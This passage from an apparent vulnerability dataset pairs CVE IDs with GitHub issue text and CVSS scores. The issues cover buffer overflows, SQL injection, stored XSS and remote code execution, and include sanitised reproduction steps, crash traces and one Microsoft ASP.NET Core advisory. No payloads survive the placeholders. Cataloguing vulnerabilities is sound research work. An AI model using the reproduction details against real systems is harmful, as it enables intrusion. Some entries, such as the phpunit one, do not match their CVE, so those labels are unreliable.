  16097. "CVE_ID": "CVE-2017-9780",
  16098. "Issue_Url_old": "https://github.com/flatpak/flatpak/issues/845",
  16099. "Issue_Url_new": "https://github.com/flatpak/flatpak/issues/845",
  16100. "Repo_new": "flatpak/flatpak",
  16101. "Issue_Created_At": "2017-06-12T16:22:42Z",
  16102. "description": "handling suid/world writable content. Breaking URLTAG out into an issue, since I think we need to do more design. A basic problem here is we have NUMBERTAG separate cases to handle: Flatpak default of APITAG (currently APITAG ) Endless OS case of APITAG (i.e. bare ) APITAG case In the original PR I was thinking of the APITAG case. For that, we have two sub options: Land fixups for APITAG to suppress all this Convert to APITAG Either way, I think we're going to need some sort of \"repository format change\" mechanism. Doing a local pull between APITAG and APITAG unfortunately will require duplicating all of the content right APITAG possibly we could teach ostree that it's fine to hardlink file content between them, and just delete all the APITAG xattrs after? System case Something like APITAG to APITAG ? We'd error out on finding world writable/setuid files. Also, we add a APITAG flag to APITAG which does the same thing as URLTAG but for the bare case?",
  16103. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16104. "severity": "HIGH",
  16105. "baseScore": 7.8,
  16106. "impactScore": 5.9,
  16107. "exploitabilityScore": 1.8
  16108. },
  16109. {
  16110. "CVE_ID": "CVE-2017-9782",
  16111. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/140",
  16112. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/140",
  16113. "Repo_new": "jasper-software/jasper",
  16114. "Issue_Created_At": "2017-06-14T04:00:33Z",
  16115. "description": "heap based buffer overflow in jp2_decode (jp2_dec.c). A heap overflow is found in jasper, and the tested commit is APITAG ERRORTAG Testcase: URLTAG",
  16116. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16117. "severity": "MEDIUM",
  16118. "baseScore": 5.5,
  16119. "impactScore": 3.6,
  16120. "exploitabilityScore": 1.8
  16121. },
  16122. {
  16123. "CVE_ID": "CVE-2017-9807",
  16124. "Issue_Url_old": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/620",
  16125. "Issue_Url_new": "https://github.com/e2openplugins/e2openplugin-openwebif/issues/620",
  16126. "Repo_new": "e2openplugins/e2openplugin-openwebif",
  16127. "Issue_Created_At": "2017-06-21T14:37:43Z",
  16128. "description": "Remote Code Execution on APITAG In line: URLTAG the APITAG call blindly executes any user supplied data. For example a remote unauthenticated attacker can use the following GET request to create a root owned file under APITAG on a APITAG NUMBERTAG HD se\" device: CODETAG We will be requesting a CVE for this issue and will report the CVE number once this becomes available, for issue coordination purposes.",
  16129. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16130. "severity": "CRITICAL",
  16131. "baseScore": 9.8,
  16132. "impactScore": 5.9,
  16133. "exploitabilityScore": 3.9
  16134. },
  16135. {
  16136. "CVE_ID": "CVE-2017-9836",
  16137. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/716",
  16138. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/716",
  16139. "Repo_new": "piwigo/piwigo",
  16140. "Issue_Created_At": "2017-06-23T16:18:05Z",
  16141. "description": "Bug Report: Stored cross site scripting (XSS) in virtual_name parameter of FILETAG . Steps to reproduce NUMBERTAG Login to site as administrator NUMBERTAG create a new album FILETAG FILETAG NUMBERTAG enter the payload \"> APITAG payload has been base NUMBERTAG encode APITAG FILETAG FILETAG NUMBERTAG now you can see this script execute everywhere FILETAG Environment: Windows XP Professional Apache APITAG PHP NUMBERTAG discovered by: topsec(lizhiqiang)",
  16142. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  16143. "severity": "MEDIUM",
  16144. "baseScore": 4.8,
  16145. "impactScore": 2.7,
  16146. "exploitabilityScore": 1.7
  16147. },
  16148. {
  16149. "CVE_ID": "CVE-2017-9841",
  16150. "Issue_Url_old": "https://github.com/sebastianbergmann/phpunit/issues/1955",
  16151. "Issue_Url_new": "https://github.com/sebastianbergmann/phpunit/issues/1955",
  16152. "Repo_new": "sebastianbergmann/phpunit",
  16153. "Issue_Created_At": "2015-11-17T17:46:31Z",
  16154. "description": "MENTIONTAG fails when running tests with phpdbg qrr. Running tests in a separate process does not work when run with the APITAG",
  16155. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16156. "severity": "CRITICAL",
  16157. "baseScore": 9.8,
  16158. "impactScore": 5.9,
  16159. "exploitabilityScore": 3.9
  16160. },
  16161. {
  16162. "CVE_ID": "CVE-2017-9846",
  16163. "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/1",
  16164. "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/1",
  16165. "Repo_new": "zhonghaozhao/winmail",
  16166. "Issue_Created_At": "2017-06-23T13:25:52Z",
  16167. "description": "winmail. FILETAG",
  16168. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  16169. "severity": "HIGH",
  16170. "baseScore": 8.8,
  16171. "impactScore": 5.9,
  16172. "exploitabilityScore": 2.8
  16173. },
  16174. {
  16175. "CVE_ID": "CVE-2017-9847",
  16176. "Issue_Url_old": "https://github.com/arvidn/libtorrent/issues/2099",
  16177. "Issue_Url_new": "https://github.com/arvidn/libtorrent/issues/2099",
  16178. "Repo_new": "arvidn/libtorrent",
  16179. "Issue_Created_At": "2017-06-23T10:13:48Z",
  16180. "description": "heap based buffer overflow in function APITAG Please provide the following information libtorrent version (or branch): the latest version NUMBERTAG platform/architecture: linu NUMBERTAG compiler and compiler version: clang NUMBERTAG please describe what symptom you see, what you would expect to see instead and how to reproduce it. Summary: There is a heap based buffer overflow in the libtorrent library. POC download: FILETAG Description: The debugging information is as follows: $ APITAG POC1 APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG eff2 at pc NUMBERTAG fc NUMBERTAG e3c NUMBERTAG a bp NUMBERTAG ffc3f6ac NUMBERTAG sp NUMBERTAG ffc3f6ac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG eff2 thread T NUMBERTAG fc NUMBERTAG e3c NUMBERTAG PATHTAG NUMBERTAG fc NUMBERTAG c NUMBERTAG f6 ( PATHTAG NUMBERTAG df1b6 ( PATHTAG NUMBERTAG dea5f ( PATHTAG NUMBERTAG fc NUMBERTAG ed3da3f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG eff2 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG dd7e2 ( PATHTAG NUMBERTAG fc NUMBERTAG fe NUMBERTAG PATHTAG ) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa 
fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING This vulnerability was triggered in function APITAG at line APITAG NUMBERTAG char const parse_int(char const start, char const end, char delimiter NUMBERTAG boost::int NUMBERTAG t& val, APITAG ec NUMBERTAG while (start < end && start != delimiter NUMBERTAG if (!numeric( start NUMBERTAG int bdecode(char const start, char const end, bdecode_node& ret NUMBERTAG error_code& ec, int error_pos, int depth_limit, int token_limit NUMBERTAG default NUMBERTAG start NUMBERTAG APITAG e = bdecode_errors::no_error NUMBERTAG start = parse_int(start, end, ':', len, e); ... Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
  16181. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16182. "severity": "MEDIUM",
  16183. "baseScore": 5.5,
  16184. "impactScore": 3.6,
  16185. "exploitabilityScore": 1.8
  16186. },
  16187. {
  16188. "CVE_ID": "CVE-2017-9848",
  16189. "Issue_Url_old": "https://github.com/Akityo/TOPSEC/issues/1",
  16190. "Issue_Url_new": "https://github.com/akityo/topsec/issues/1",
  16191. "Repo_new": "akityo/topsec",
  16192. "Issue_Created_At": "2017-06-27T14:58:53Z",
  16193. "description": "SQL injection vulnerability in APITAG in APITAG in Easysite NUMBERTAG soap\u6ce8\u5165 easysite webservice \u6587\u4ef6\uff1a FILETAG FILETAG APITAG parameter FILETAG FILETAG run in sqlmap POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Type: text/xml; charset=utf NUMBERTAG Content Length: length APITAG \" URLTAG \" APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  16194. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16195. "severity": "CRITICAL",
  16196. "baseScore": 9.8,
  16197. "impactScore": 5.9,
  16198. "exploitabilityScore": 3.9
  16199. },
  16200. {
  16201. "CVE_ID": "CVE-2017-9868",
  16202. "Issue_Url_old": "https://github.com/eclipse/mosquitto/issues/468",
  16203. "Issue_Url_new": "https://github.com/eclipse/mosquitto/issues/468",
  16204. "Repo_new": "eclipse/mosquitto",
  16205. "Issue_Created_At": "2017-06-21T22:00:27Z",
  16206. "description": "mosquitto.db can be read by all [SECURITY]. mosquitto.db file is world readable (file mode rw-r--r--, i.e. 0644). This allows any local user to read the persisted topic database and retained values at any time. A vulnerability such as this may prove disastrous to sensitive or secret data that can be contained within it. Mitigation: restrict the file's permissions to the user account that runs the mosquitto service. Tested on an up to date raspberry pi NUMBERTAG with the latest release of mosquitto.",
  16207. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  16208. "severity": "MEDIUM",
  16209. "baseScore": 5.5,
  16210. "impactScore": 3.6,
  16211. "exploitabilityScore": 1.8
  16212. },
  16213. {
  16214. "CVE_ID": "CVE-2017-9928",
  16215. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/74",
  16216. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/74",
  16217. "Repo_new": "ckolivas/lrzip",
  16218. "Issue_Created_At": "2017-05-13T12:04:28Z",
  16219. "description": "stack buffer overflow in get_fileinfo APITAG on lrzip version NUMBERTAG ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  16220. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16221. "severity": "MEDIUM",
  16222. "baseScore": 5.5,
  16223. "impactScore": 3.6,
  16224. "exploitabilityScore": 1.8
  16225. },
  16226. {
  16227. "CVE_ID": "CVE-2017-9929",
  16228. "Issue_Url_old": "https://github.com/ckolivas/lrzip/issues/75",
  16229. "Issue_Url_new": "https://github.com/ckolivas/lrzip/issues/75",
  16230. "Repo_new": "ckolivas/lrzip",
  16231. "Issue_Created_At": "2017-05-13T12:06:14Z",
  16232. "description": "stack buffer overflow in get_fileinfo APITAG on lrzip version NUMBERTAG ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  16233. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16234. "severity": "MEDIUM",
  16235. "baseScore": 5.5,
  16236. "impactScore": 3.6,
  16237. "exploitabilityScore": 1.8
  16238. },
  16239. {
  16240. "CVE_ID": "CVE-2017-9949",
  16241. "Issue_Url_old": "https://github.com/radare/radare2/issues/7683",
  16242. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7683",
  16243. "Repo_new": "radareorg/radare2",
  16244. "Issue_Created_At": "2017-06-05T09:21:52Z",
  16245. "description": "Stack buffer underflow in APITAG Stack buffer underflow in APITAG Git HEAD: APITAG Payload in URLTAG To reproduce: APITAG ASAN: ERRORTAG",
  16246. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16247. "severity": "HIGH",
  16248. "baseScore": 7.8,
  16249. "impactScore": 5.9,
  16250. "exploitabilityScore": 1.8
  16251. },
  16252. {
  16253. "CVE_ID": "CVE-2017-9988",
  16254. "Issue_Url_old": "https://github.com/libming/libming/issues/85",
  16255. "Issue_Url_new": "https://github.com/libming/libming/issues/85",
  16256. "Repo_new": "libming/libming",
  16257. "Issue_Created_At": "2017-06-23T14:15:10Z",
  16258. "description": "There is crash in listswf tool of libming . A crafted input can lead to a APITAG damage.. POC is got from FILETAG Description: The debugging information is as follows: $ ./listswf POC1 there is overflow in function APITAG that lead to malloc a large size of memory failure. It makes the program crash in APITAG the details is below. APITAG nsset APITAG = APITAG NUMBERTAG APITAG nsset >NS = malloc(sizeof(U NUMBERTAG nsset APITAG malloc failure, return NULL APITAG nsset >NS[i] = APITAG //cause NULL pointer DEF $gdb ./listswf (gdb) set args POC1 (gdb) r ... (gdb) bt NUMBERTAG APITAG (f=<optimized out>, nsset=<optimized out>, f=<optimized out>) at APITAG NUMBERTAG APITAG (cpool NUMBERTAG f NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in APITAG APITAG f NUMBERTAG at APITAG NUMBERTAG b4 in APITAG (f NUMBERTAG length NUMBERTAG at APITAG NUMBERTAG in APITAG (f NUMBERTAG length NUMBERTAG header=<optimized out>) at APITAG NUMBERTAG f NUMBERTAG in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
  16259. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16260. "severity": "MEDIUM",
  16261. "baseScore": 6.5,
  16262. "impactScore": 3.6,
  16263. "exploitabilityScore": 2.8
  16264. },
  16265. {
  16266. "CVE_ID": "CVE-2017-9989",
  16267. "Issue_Url_old": "https://github.com/libming/libming/issues/86",
  16268. "Issue_Url_new": "https://github.com/libming/libming/issues/86",
  16269. "Repo_new": "libming/libming",
  16270. "Issue_Created_At": "2017-06-23T14:17:45Z",
  16271. "description": "There is crash in listswf tool of libming by a crafted input that will lead to a APITAG damage.. The POC is got from FILETAG Description: The debugging information is as follows: There is previous incorrect operation cause si >size too large that make malloc memory failure. It leads the program crash in APITAG , the details is below. APITAG buffer = malloc(si APITAG APITAG is too large buffer is NULL,malloc failure APITAG memset(buffer NUMBERTAG si APITAG NULL pointer deference $gdb ./listswf (gdb) set args POC2 (gdb) r ... (gdb) bt (gdb) bt NUMBERTAG memset_sse2 () at PATHTAG NUMBERTAG e0f3 in APITAG (si=<optimized out>) at APITAG NUMBERTAG APITAG (abc=<optimized out>, APITAG out>) at APITAG NUMBERTAG ec NUMBERTAG in APITAG (abc NUMBERTAG mi NUMBERTAG ffff NUMBERTAG f8) at APITAG NUMBERTAG ff NUMBERTAG in APITAG (abc NUMBERTAG at APITAG NUMBERTAG b0ca in APITAG (type=<optimized out>, blockp NUMBERTAG stream=<optimized out>) at APITAG NUMBERTAG c6 in APITAG (f=<optimized out>) at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Credits: This vulnerability is detected by team OWL NUMBERTAG with our custom fuzzer APITAG Please contact EMAILTAG and EMAILTAG du.cn if you need more info about the team, the tool or the vulnerability.",
  16272. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  16273. "severity": "MEDIUM",
  16274. "baseScore": 6.5,
  16275. "impactScore": 3.6,
  16276. "exploitabilityScore": 2.8
  16277. },
  16278. {
  16279. "CVE_ID": "CVE-2018-0608",
  16280. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1775",
  16281. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1775",
  16282. "Repo_new": "h2o/h2o",
  16283. "Issue_Created_At": "2018-05-31T13:46:42Z",
  16284. "description": "TBD.",
  16285. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  16286. "severity": "CRITICAL",
  16287. "baseScore": 9.8,
  16288. "impactScore": 5.9,
  16289. "exploitabilityScore": 3.9
  16290. },
  16291. {
  16292. "CVE_ID": "CVE-2018-0787",
  16293. "Issue_Url_old": "https://github.com/aspnet/Announcements/issues/295",
  16294. "Issue_Url_new": "https://github.com/aspnet/announcements/issues/295",
  16295. "Repo_new": "aspnet/announcements",
  16296. "Issue_Created_At": "2018-03-13T17:07:23Z",
  16297. "description": "Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability. Microsoft Security Advisory CVETAG : ASP.NET Core Elevation Of Privilege Vulnerability Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core versions NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a security vulnerability in all public versions of ASP.NET Core where an elevation of privilege vulnerability exists when a ASP.NET Core web application fails to validate web requests correctly. Discussion Discussion for this issue can be found at URLTAG Mitigation factors Sites are not vulnerable to this elevation of privilege when: The site is hosted behind a proxy, such as Internet Information Services (IIS), NGINX, or Apache, where: The proxy validates the host header, and The proxy is configured to listen on fully qualified domain names or The proxy is configured with a wildcard subdomain where the root domain is fully controlled by the site owner. For example, if IIS is configured to respond to requests for APITAG or APITAG hosts, the application is protected. If IIS is configured to respond to any request from any host, the application is vulnerable. Kestrel does not have the capability to validate host headers and is vulnerable if not placed behind a proxy that performs the host header validation. Apps hosted in Azure Web Apps are not susceptible to this vulnerability. APITAG APITAG Affected software Any ASP.NET Core hosted application which is directly exposed to the internet, or hosted behind a proxy which does not validate or restict host headers to known good values. 
The vulnerability also affects any ASP.NET Core NUMBERTAG project if it uses the following package versions, which must also be updated app update , in addition to addressing your proxy configuration : Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG and later APITAG NUMBERTAG and later No patches are available for ASP.NET Core NUMBERTAG or ASP.NET Core NUMBERTAG Microsoft requires that you place your NUMBERTAG ASP.NET Core application behind a proxy. You must address the configuration of your proxy to protect your application. If you're not running ASP.NET Core NUMBERTAG behind a proxy, you must either place a proxy in front of your application or upgrade to ASP.NET Core NUMBERTAG and add the host validating middleware provided at FILETAG Advisory FAQ How do I know if I am affected? Review the server and proxy configuration instructions configuration below to see if your system is configured correctly, and adjust the configuration if necessary. How do I fix the issue? You must address the configuration configuration of your server or proxy to protect your application to limit requests to known hosts. If you're not running Kestrel NUMBERTAG behind a proxy, you must either place a proxy in front of your application or upgrade to ASP.NET Core NUMBERTAG and follow the NUMBERTAG instructions below. ASP.NET Core NUMBERTAG applications must update your code app update to fully protect your application. APITAG APITAG Server and Proxy configuration You must examine your externally facing server or proxy configuration and ensure it requires host headers with fully qualified domain names, or known sub domains if you are using sub domain wild cards. ASP.NET Core applications behind IIS URLTAG To configure IIS to only respond to know hosts: Open IIS Manager. Expand the Sites node for the machine you want to configure. Select the site by clicking on the site. In the Actions list on the right hand side of IIS Manager, click Bindings . 
Edit any bindings that do not have a host name to specify one. Do not use a APITAG wildcard unless it's against a domain under your control. For example, APITAG is safe, APITAG is not. ASP.NET Core applications running publicly on Kestrel URLTAG Kestrel does not have the capability to validate host headers. It must either be placed behind a proxy that performs the host header validation or the validation must be performed within the application by adding host filtering middleware provided at URLTAG You must also update your dependencies app update to fully protect your application. ASP.NET Core applications running on FILETAG To configure URL prefixes and ports, you can use the APITAG extension method, the urls command line argument, the ASPNETCORE_URLS environment variable, or the APITAG property on APITAG URLTAG . The following code example uses APITAG . CODETAG ASP.NET Core applications behind NGINX URLTAG To configure NGINX as a reverse proxy to forward requests to your ASP.NET Core app, replace the contents PATHTAG with the following: CODETAG Note that with NGINX, when there is no match for APITAG , NGINX will pick the default server. If no default server has been defined, the first server in the conf file is the default server. Best practice is to add a specific default server which returns a status code of NUMBERTAG in the conf file. An example default server configuration would be as follows: APITAG With the preceding configuration file and default server, NGINX accepts public traffic on port NUMBERTAG with host header APITAG or APITAG . Requests not matching these hosts won't get forwarded to Kestrel. NGINX forwards the matching requests to Kestrel at APITAG . See FILETAG for more information. Once the NGINX configuration is established, run APITAG to verify the syntax of the configuration files. If the configuration file test is successful, force NGINX to pick up the changes by running APITAG . 
ASP.NET Core applications behind Apache URLTAG Configuration files for Apache are located within the APITAG directory. Any file with the APITAG extension: Is processed in alphabetical order, and The module configuration files in APITAG are processed. The module configuration files in APITAG contain any configuration files necessary to load modules. CODETAG The APITAG block can appear multiple times, in one or more files on a server. In the preceding configuration file, Apache accepts public traffic on port NUMBERTAG The domain APITAG is being served, and the APITAG alias resolves to the same website. See FILETAG for more information. Requests are proxied at the root to port NUMBERTAG of the server at APITAG For bi directional communication, APITAG and APITAG are required. Save the file and test the configuration. If everything passes, the response is APITAG . bash sudo service httpd configtest Restart Apache: bash sudo systemctl restart httpd sudo systemctl enable httpd APITAG APITAG ASP.NET Core NUMBERTAG application code updates If you're targeting .NET Core NUMBERTAG and the APITAG \"metapackage\": Update its version number to NUMBERTAG or later. Updating will pull in the fixed packages listed above. If you're targeting .NET Framework, update the packages listed above to their safe version or later. If your application is using Kestrel without a proxy or the APITAG functionality APITAG with APITAG you must also add the host filtering middleware provided at URLTAG .NET Core and ASP.NET Core have two types of dependencies: direct and transitive. You must follow the update instructions below to address both types of dependency. Direct dependencies Direct dependencies are dependencies where you specifically add a package to your project. For example, if you add the APITAG package to your project then you have taken a direct dependency on APITAG . Direct dependencies are discoverable by examining your csproj file. 
Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if you add the APITAG package to your project it depends on the APITAG package (among others). Your project has a direct dependency on APITAG and a transitive dependency on the APITAG package. Transitive dependencies are reviewable: In the Visual Studio Solution Explorer window, which supports searching. By examining the FILETAG file contained in the obj directory of your project. The FILETAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. Fixing direct dependencies \u2013 Projects targeting .NET Core Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable metapackage, as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to a secure package version. In this example, update APITAG to NUMBERTAG or later. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. 
Fixing direct dependencies \u2013 Projects targeting .NET Framework Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes. The following shows an example project file: CODETAG The example has a reference to a single package, as seen by the APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The example shows a direct dependency on one of the vulnerable packages from the table above, APITAG version NUMBERTAG To update to the secure package, change the version number to the updated package version. In the example, this would be updating APITAG to NUMBERTAG and later. Save the csproj file. The updated and secure csproj look as follows: CODETAG If you're using Visual Studio and save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependency version. After updating your direct dependencies Recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to a compatible version. For example if your project refers directly to APITAG with a version number of APITAG , when you update your APITAG package to NUMBERTAG compilation will throw: APITAG To fix this, edit the version for the expected package to be the version expected by updating your FILETAG in the same way that you used to update the vulnerable package versions. After you've addressed all of your direct dependencies, you must review your transitive dependencies. 
Reviewing transitive dependencies There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer, or you can review the FILETAG file. Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio NUMBERTAG and then press Ctrl+; to activate the search in Solution Explorer. Search for each of the vulnerable package names above and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In these results, you can see a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In this example, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. In the example, the APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a vulnerable version of APITAG . Manually reviewing FILETAG (VS NUMBERTAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for each of the vulnerable packages, using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table above. For example, a search result that shows APITAG is a reference to NUMBERTAG of APITAG . 
If your FILETAG file includes references to any of the vulnerable packages shown above, then you need to fix the transitive dependencies. Overriding transitive dependencies If you have not found any reference to any vulnerable packages this means: None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. If your transitive dependency review found references to any of the vulnerable packages you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the content menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG For each of the vulnerable packages your search returned, you must add a direct dependency to the updated version by adding it to the csproj file. You do this by adding a new line to the dependencies section, referring the fixed version. For example, if your search showed a transitive reference to the vulnerable APITAG version NUMBERTAG you would add a reference to the fixed version, that is NUMBERTAG or later. CODETAG After you have added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Rebuild your application. Test and deploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. 
Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgements Mikhail Shcherbakov URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  16298. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  16299. "severity": "HIGH",
  16300. "baseScore": 8.8,
  16301. "impactScore": 5.9,
  16302. "exploitabilityScore": 2.8
  16303. },
  16304. {
  16305. "CVE_ID": "CVE-2018-1000022",
  16306. "Issue_Url_old": "https://github.com/spesmilo/electrum/issues/3374",
  16307. "Issue_Url_new": "https://github.com/spesmilo/electrum/issues/3374",
  16308. "Repo_new": "spesmilo/electrum",
  16309. "Issue_Created_At": "2017-11-24T23:49:02Z",
  16310. "description": "Password protect the JSONRPC interface. The JSONRPC interface is currently completely unprotected, I believe it should be a priority to add at least some form of password protection. Scans for the JSONRPC interface of Ethereum wallets have already started: URLTAG",
  16311. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N",
  16312. "severity": "MEDIUM",
  16313. "baseScore": 5.3,
  16314. "impactScore": 3.6,
  16315. "exploitabilityScore": 1.6
  16316. },
  16317. {
  16318. "CVE_ID": "CVE-2018-1000023",
